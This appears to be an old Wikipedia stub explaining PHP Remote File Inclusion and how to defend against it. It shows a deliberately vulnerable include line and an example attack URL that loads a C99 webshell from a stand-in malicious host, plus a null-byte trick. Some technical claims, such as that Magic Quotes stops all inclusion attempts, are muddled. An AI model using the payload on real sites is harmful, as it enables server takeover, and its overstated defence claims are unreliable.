Remote File Inclusion
From Wikipedia, the free encyclopedia
Remote File Inclusion or RFI is a technique used to attack Internet websites from a remote computer.
A hacker's dream is to be able to run his own code on the website he is attacking. With a Remote File Inclusion attack, this is exactly what is made possible. The attacker is allowed to "include" his own malicious code in the space provided for PHP programs on a webpage. For instance, a piece of vulnerable PHP code would look like this:
include($title . '/archive.php');
This line of PHP code, when executed, yields a URL like the following:
www.hacked.com/index.php?title=archive.php?
Because the "title" variable isn't specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server like this:
www.hacked.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php
Note: "?archive.php" is added to the end of the URL above only to satisfy "/archive.php" in the PHP code
which helps avoid errors when executing the code. Simply adding %00 (an ASCII null byte) instead of
"?archive.php" will have the same effect and is for obvious reasons easier to use.
The include function above instructs the server to retrieve "archive.php" and run its code. However, the code does not say what to do if the user changes "archive.php" to a file of his own (http://www.malicious.code.com/C99.php); So the script runs whatever file "archive.php" is replaced with. In this case, C99.php. This allows the hacker to include any remote file of his choice simply by editing the URL. Usually, the remote file a hacker chooses to include is a webshell. This tool written in the PHP coding language displays the files and folders on the server and can edit or add or delete files among other tasks. A webshell is commonly referred to among hackers as a c99 shell or PHP shell. Once this task is completed, the attacker can see, edit and add any file on the server and potentially escalate his privileges to root (administrator on Linux) if the server is not patched.
The reason this is possible is because of "register_globals". Register-globals is a PHP flag, that automatically defines variables that are entered in the URL of the papge you are trying to access. So in the example, the $title variable will automatically be filled with "http://www.malicious.code.com/C99.php?archive.php" before the PHP script gets executed. Register_globals in now set to OFF by default on newer servers because of the problems it created but can still be easily turned ON at any time.
By turning off register_globals, you can easily avoid most of these problems. Another way to eliminate these threats is to define what the included file, in our case "archive.php", can and can't be. By doing this, if an attacker tries to include his own file, the PHP program will stop executing because the malicious file is not part of the acceptable file definition. One last tool that has been implemented in newer versions of servers is "Magic Quotes", which is a program that recognizes certain characters in URL's (ie. / ; : ( ) ' " null byte) and replaces them with an escaped version of the character, meaning it has a backslash (\) in front of the invalid character so it can't cause as much damage. This program brings any attempt at including a malicious file to a halt.
 |
This Internet-related article is a stub. You can help Wikipedia by expanding it. |
